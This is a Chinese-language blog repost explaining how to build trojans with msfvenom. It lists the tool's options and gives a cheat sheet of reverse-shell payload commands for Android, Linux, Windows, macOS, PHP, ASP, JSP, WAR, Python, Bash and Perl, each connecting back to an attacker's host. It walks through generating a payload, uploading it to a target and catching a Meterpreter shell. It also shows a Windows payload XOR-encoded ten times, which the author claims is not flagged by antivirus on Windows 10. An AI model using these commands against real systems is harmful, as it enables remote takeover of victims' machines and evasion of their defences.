失眠网,内容丰富有趣,生活中的好帮手!
失眠网 > msfvenom木马生成工具

msfvenom木马生成工具

时间:2018-12-13 09:07:17

相关推荐

msfvenom木马生成工具

msfvenom

命令常见shell实例参考

命令

-l:列出所有模块。类型有:payloads, encoders, nops, platforms, archs, encrypt, formats, al.(使用 -l payloads列出payload,- -list-options 列出载荷参数)

-p:指定要使用的有效负载。-f:输出文件的格式 ,(-l formats列出所有文件格式)

-e:指定要使用的编码器,(-list encodes列出所有编码器) –smallest: 使用所有可用的编码器生成尽可能小的有效负载

-a:指定架构平台(–l archs 列出所有架构)

–platform:指定操作系统平台(-l platforms 列出所有平台)

-o:保存至指定文件。-b:要避免的字符,示例:’\x00\xff’n: 在payload上添加指定长度的nop指令-s:产生的payload的最大大小. –encoder-space:编码payload的最大大小. -i: 对payload进行编码的次数-c:指定一个win32的shellcode文件-x:指定要用作模板的自定义可执行文件。-k:保留-x行为并将有效负载作为新线程注入-v:指定用于某些输出格式的自定义变量名-t:从STDIN读取有效负载时等待的秒数(默认值为30,0表示禁用)msfvenom -l | grep windows | grep x64 | grep tcp:列出windows平台,下x64架构tcp payload

常见shell

安卓app:msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o ~/Desktop/test2.apk Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exeMac  msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho PHP msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php  ASP msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp JSP msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp WAR msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war Python msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py Bashmsfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh      Perl msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Addre0ss> LPORT=<Your Port to Connect On> -f raw > shell.pl   

实例

linux:使用linux/x86/meterpreter/reverse_tcp,查看参数

当前目录下生成shell.elf,将文件上传至靶机

使用msf,exploit/multi/handler模块监听

set payload linux/x86/meterpreter/reverse_tcpset lhost 192.168.186.128set lport 4444

当目标运行木马文件,就拿到一个meterpreter shell。

windows:windows64位,经过10次异或编码。在windows10下无报毒。

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.186.128 LPORT=8888 --platform windows -e x64/xor -i 10 -a x64 -f exe >shell.exe

同样在msf下使用exploit/multi/handle模块。

执行后,成功拿到meterpreter shell

参考

/BOHB-yunying/p/11628896.html

/qq_36119192/article/details/83869141

如果觉得《msfvenom木马生成工具》对你有帮助,请点赞、收藏,并留下你的观点哦!

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。